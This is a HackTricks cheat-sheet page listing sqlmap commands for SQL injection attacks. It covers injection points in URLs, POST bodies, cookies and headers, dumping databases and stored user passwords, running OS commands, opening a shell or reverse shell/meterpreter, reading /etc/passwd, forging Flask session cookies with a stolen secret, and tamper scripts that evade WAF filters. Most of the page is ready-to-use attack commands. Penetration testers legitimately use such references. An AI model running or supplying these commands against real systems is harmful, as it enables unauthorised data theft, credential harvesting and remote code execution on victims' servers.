HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
๐Ÿ•ธ
Pentesting Web
SQLMap - Cheetsheat
Support HackTricks and get benefits!

Basic arguments for SQLmap

Generic

1
-u "<URL>"
2
-p "<PARAM TO TEST>"
3
--user-agent=SQLMAP
4
--random-agent
5
--threads=10
6
--risk=3 #MAX
7
--level=5 #MAX
8
--dbms="<KNOWN DB TECH>"
9
--os="<OS>"
10
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
11
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
12
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
13
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
14
--proxy=http://127.0.0.1:8080
15
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
Copied!

Retrieve Information

Internal

1
--current-user #Get current user
2
--is-dba #Check if current user is Admin
3
--hostname #Get hostname
4
--users #Get usernames od DB
5
--passwords #Get passwords of users in DB
6
--privileges #Get privileges
Copied!

DB data

1
--all #Retrieve everything
2
--dump #Dump DBMS database table entries
3
--dbs #Names of the available databases
4
--tables #Tables of a database ( -D <DB NAME> )
5
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
6
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
Copied!

Injection place

From Burp/ZAP capture

Capture the request and create a req.txt file
1
sqlmap -r req.txt --current-user
Copied!

GET Request Injection

1
sqlmap -u "http://example.com/?id=1" -p id
2
sqlmap -u "http://example.com/?id=*" -p id
Copied!

POST Request Injection

1
sqlmap -u "http://example.com" --data "username=*&password=*"
Copied!

Injections in Headers and other HTTP Methods

1
#Inside cookie
2
sqlmap -u "http://example.com" --cookie "mycookies=*"
3
โ€‹
4
#Inside some header
5
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
6
sqlmap -u "http://example.com" --headers="referer:*"
7
โ€‹
8
#PUT Method
9
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
10
โ€‹
11
#The injection is located at the '*'
Copied!

Indicate string when injection is successful

1
--string="string_showed_when_TRUE"
Copied!

Eval

Sqlmap allows the use of -e or --eval to process each payload before sending it with some python oneliner. This makes very easy and fast to process in custom ways the payload before sending it. In the following example the flask cookie session is signed by flask with the known secret before sending it:
1
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
Copied!

Shell

1
#Exec command
2
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
3
โ€‹
4
#Simple Shell
5
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
6
โ€‹
7
#Dropping a reverse-shell / meterpreter
8
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
Copied!

Read File

1
--file-read=/etc/passwd
Copied!

Crawl a website with SQLmap and auto-exploit

1
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
2
โ€‹
3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
4
--crawl = how deep you want to crawl a site
5
--forms = Parse and test forms
Copied!

Second Order Injection

1
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
2
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
Copied!
โ€‹Read this post about how to perform simple and complex second order injections with sqlmap.

Customizing Injection

Set a suffix

1
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
Copied!

Prefix

1
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
Copied!

Help finding boolean injection

1
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
2
sqlmap -r r.txt -p id --not-string ridiculous --batch
Copied!

Tamper

Remember that you can create your own tamper in python and it's very simple. You can find a tamper example in the Second Order Injection page here.
1
--tamper=name_of_the_tamper
2
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Copied!
Tamper
Description
apostrophemask.py
Replaces apostrophe character with its UTF-8 full width counterpart
apostrophenullencode.py
Replaces apostrophe character with its illegal double unicode counterpart
appendnullbyte.py
Appends encoded NULL byte character at the end of payload
base64encode.py
Base64 all characters in a given payload
between.py
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
bluecoat.py
Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator
chardoubleencode.py
Double url-encodes all characters in a given payload (not processing already encoded)
commalesslimit.py
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
commalessmid.py
Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
concat2concatws.py
Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
charencode.py
Url-encodes all characters in a given payload (not processing already encoded)
charunicodeencode.py
Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022"
charunicodeescape.py
Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022"
equaltolike.py
Replaces all occurances of operator equal ('=') with operator 'LIKE'
escapequotes.py
Slash escape quotes (' and ")
greatest.py
Replaces greater than operator ('>') with 'GREATEST' counterpart
halfversionedmorekeywords.py
Adds versioned MySQL comment before each keyword
ifnull2ifisnull.py
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
modsecurityversioned.py
Embraces complete query with versioned comment
modsecurityzeroversioned.py
Embraces complete query with zero-versioned comment
Support HackTricks and get benefits!